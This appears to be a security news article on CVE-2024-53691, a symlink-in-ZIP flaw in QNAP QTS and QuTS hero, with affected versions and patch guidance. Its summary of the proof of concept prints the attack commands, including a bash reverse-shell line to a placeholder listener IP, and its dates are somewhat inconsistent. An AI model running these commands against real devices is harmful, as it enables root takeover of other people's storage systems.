A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-53691, has recently come to light, affecting users of QNAP’s QTS and QuTS Hero operating systems.
This vulnerability enables remote attackers with user access privileges to traverse the file system and run arbitrary code on affected systems.
With a CVSS score of 8.7, the severity of this vulnerability underscores the urgent need for QNAP users to apply recommended updates.
Discovery and Impact
As reported on April 22, 2024, CVE-2024-53691 allows attackers to exploit a link following a vulnerability.
By leveraging their existing access rights, they can upload a symbolic link through a ZIP file and manipulate the system’s encrypt/decrypt functions to achieve arbitrary file write capabilities.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
This exploitation can escalate the attacker’s privileges and result in full system compromise, executing code as the root user.
The vulnerability primarily affects QTS versions 5.1.x and QuTS hero h5.1.x. Patches were released on September 7, 2024, through the following fixed versions:
- QTS: 5.2.0.2802 build 20240620 and later
- QuTS hero: 5.2.0.2802 build 20240620 and later
Affected Versions
- Affected: QTS 5.1.x, QuTS hero h5.1.x
- Fixed: QTS 5.2.0.2802 build 20240620 and later, QuTS hero h5.2.0.2802 build 20240620 and later
Proof of Concept (PoC) Exploit Released
Following the discovery, a proof-of-concept (PoC) exploit has been released by Github, demonstrating the exploitation of CVE-2024-53691.
The exploit involves several key steps, beginning with creating a symbolic link to an executable file that the attacker can use to gain shell access. Below is an overview of the process:
- Create a Symbolic Link:
The attacker creates a symlink that points to a sensitive file. For example:
ln -s /home/httpd/cgi-bin/restore_config.cgi link.txt- Zip and Upload:
The symlink is zipped and uploaded to the QNAP device through its web interface. The attacker can use the following commands:
zip --symlink pwn.zip link.txt- Payload Preparation:
A payload file containing a reverse shell script is created, allowing the attacker to establish a remote connection:
#!/bin/sh
bash -c "bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1" &- Execution Trigger:
Once the ZIP file is extracted and the payload is executed, the attacker can gain shell access as an admin.
QNAP strongly advises users to update their systems to fixed versions as soon as possible to mitigate potential risks associated with this vulnerability. To update:
- Log in to the QTS or QuTS Hero interface as an administrator.
- Navigate to Control Panel > System > Firmware Update.
- Click Check for Update to download and install any available updates.
Users should also regularly monitor their devices for any unauthorized access and implement additional security measures such as network firewalls and intrusion detection systems.
The disclosure of CVE-2024-53691 highlights the importance of cybersecurity vigilance and the need for regular software updates.
By taking proactive steps to secure their devices, QNAP users can protect themselves from potential exploitation of this serious vulnerability.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
 vulnerability, tracked as CVE-2024-53691, has recently come to light, affecting users of QNAP's QTS and QuTS Hero operating systems.){kind=link}